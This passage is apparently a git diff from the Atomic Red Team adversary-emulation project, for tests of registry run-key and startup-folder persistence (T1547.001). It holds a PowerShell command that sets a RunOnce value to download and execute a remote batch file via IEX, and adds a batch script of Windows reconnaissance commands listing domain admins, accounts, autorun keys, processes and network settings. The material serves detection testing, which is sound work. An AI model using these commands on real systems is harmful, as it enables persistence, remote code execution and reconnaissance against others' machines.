Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' +set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"' ``` #### Cleanup Commands: @@ -273,7 +273,8 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
## Atomic Test #6 - Suspicious bat file run from startup Folder -bat files can be placed in and executed from the startup folder to maintain persistance. +bat files can be placed in and executed from the startup folder to maintain persistance + Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml index 696b3681..92b7f610 100644 --- a/atomics/T1547.001/T1547.001.yaml +++ b/atomics/T1547.001/T1547.001.yaml @@ -59,7 +59,7 @@ atomic_tests: executor: command: | $RunOnceKey = "#{reg_key_path}" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"' + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"' cleanup_command: | Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore name: powershell @@ -106,7 +106,8 @@ atomic_tests: - name: Suspicious bat file run from startup Folder auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e description: | - bat files can be placed in and executed from the startup folder to maintain persistance. + bat files can be placed in and executed from the startup folder to maintain persistance + Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. supported_platforms: diff --git a/atomics/T1547.001/src/Discovery.bat b/atomics/T1547.001/src/Discovery.bat new file mode 100644 index 00000000..46677d8d --- /dev/null +++ b/atomics/T1547.001/src/Discovery.bat @@ -0,0 +1,44 @@ +net user Administrator /domain +net Accounts +net localgroup administrators +net use +net share +net group "domain admins" /domain +net config workstation +net accounts +net accounts /domain +net view +sc.exe query +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices +reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify +reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit +reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell +reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell +reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run +wmic useraccount list +wmic useraccount get /ALL +wmic startup list brief +wmic share list +wmic service get name,displayname,pathname,startmode +wmic process list brief +wmic process get caption,executablepath,commandline +wmic qfe get description,installedOn /format:csv +arp -a +whoami +ipconfig /displaydns +route print +netsh advfirewall show allprofiles +systeminfo +qwinsta +quser